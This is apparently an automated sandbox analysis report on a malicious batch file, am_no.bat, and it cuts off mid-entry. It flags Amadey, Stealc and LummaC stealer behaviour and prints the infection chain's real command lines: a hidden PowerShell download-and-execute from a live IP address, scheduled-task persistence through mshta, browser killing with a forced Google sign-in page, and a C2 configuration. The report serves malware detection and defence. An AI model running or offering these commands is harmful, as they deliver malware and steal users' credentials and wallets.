Windows Analysis Report
am_no.bat

Overview

General Information

Sample name: am_no.bat
Analysis ID: 1632121
MD5: cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1: b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256: 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
Tags: 092155, Amadey, bat, user-aachum
Infos:

Detection

Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Credential Flusher
Yara detected Healer AV Disabler
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected obfuscated html page
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain checking for user administrative privileges
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies windows update settings
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • timeout.exe (PID: 6972 cmdline: timeout /t 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 7056 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7072 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5032 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6184 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6440 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6476 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • schtasks.exe (PID: 6664 cmdline: schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • mshta.exe (PID: 6736 cmdline: mshta "C:\Temp\mtzRdqIHD.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 4764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 483d2fa8a0d53818306efeb32d3.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
          • rapes.exe (PID: 6456 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
  • mshta.exe (PID: 6660 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\mtzRdqIHD.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 483d2fa8a0d53818306efeb32d3.exe (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 34A1010B4F6CF9C985D71453702602D7)
      • svchost.exe (PID: 7112 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 34A1010B4F6CF9C985D71453702602D7)
  • svchost.exe (PID: 4028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 4700 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 34A1010B4F6CF9C985D71453702602D7)
    • 2qv26zF.exe (PID: 6652 cmdline: "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe" MD5: 903EB4BCB7F7479A651A0813E69FFAD9)
      • spoolsv.exe (PID: 3128 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
    • 19be97887a.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" MD5: DA0CBB9E2A1C51DCC66D381F995F48B4)
    • bb5ad48269.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe" MD5: B083B881D7C60C5ECD8E4BD354043178)
    • c6e8248d4e.exe (PID: 6080 cmdline: "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe" MD5: D9C528B98DEC61D94D18A752ED8EA2C7)
      • taskkill.exe (PID: 5960 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3572 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6028 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5380 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4232 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 2384 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • taskkill.exe (PID: 6372 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ab5415a7b5.exe (PID: 5236 cmdline: "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe" MD5: B55E5FB40A834E5F53D181D91C21F5C8)
    • 6f3323f1e6.exe (PID: 6692 cmdline: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" MD5: E898E590B906BE9CE110FBBB538EF93E)
      • cmd.exe (PID: 2712 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 19be97887a.exe (PID: 1496 cmdline: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" MD5: DA0CBB9E2A1C51DCC66D381F995F48B4)
    • chrome.exe (PID: 5820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • firefox.exe (PID: 6552 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 2096 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 3680 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • bb5ad48269.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe" MD5: B083B881D7C60C5ECD8E4BD354043178)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Temp\mtzRdqIHD.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |

Source | Rule | Description | Author | Strings
00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
(table truncated: 27 entries in total)

Source | Rule | Description | Author | Strings
35.2.19be97887a.exe.e20000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_4764.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_5884.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe, ParentProcessId: 6692, ParentProcessName: 6f3323f1e6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2712, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe, ParentProcessId: 6692, ParentProcessName: 6f3323f1e6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2712, ProcessName: cmd.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 4700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19be97887a.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, ParentProcessId: 1496, ParentProcessName: 19be97887a.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, ProcessId: 5820, ProcessName: chrome.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 4700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19be97887a.exe
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 7112, ProcessName: svchost.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 